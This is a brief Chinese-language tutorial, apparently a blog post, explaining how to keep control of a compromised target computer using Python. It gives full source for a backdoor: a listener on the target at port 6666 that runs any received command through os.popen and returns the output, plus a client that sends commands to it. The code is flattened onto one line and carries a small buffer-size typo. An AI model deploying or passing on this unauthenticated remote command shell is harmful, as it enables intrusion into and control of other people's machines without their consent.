|
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import *from os import *s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议s.bind(('',6666))#补丁端口s.listen(1)#开始监听一个队列while True: sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号 print ('客户端:',addr) while True: cmd=sock.recv(1024)#缓存长度 接收传递过来 cmdstr=cmd.decode() if cmdstr=='exit': print ('客户端:',addr,'关闭') sock.close() break result=popen(cmdstr).read() sock.send(result.encode())s.close() 本机运行 from socket import *from os import *c=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议c.connect(('127.0.0.1',6666))#连接地址while True: cmd=input("cmd:") c.send(cmd.encode())#必须传递流 if cmd=='exit': c.close() break data=c.recv(1014) print (data.decode())
|
|
|
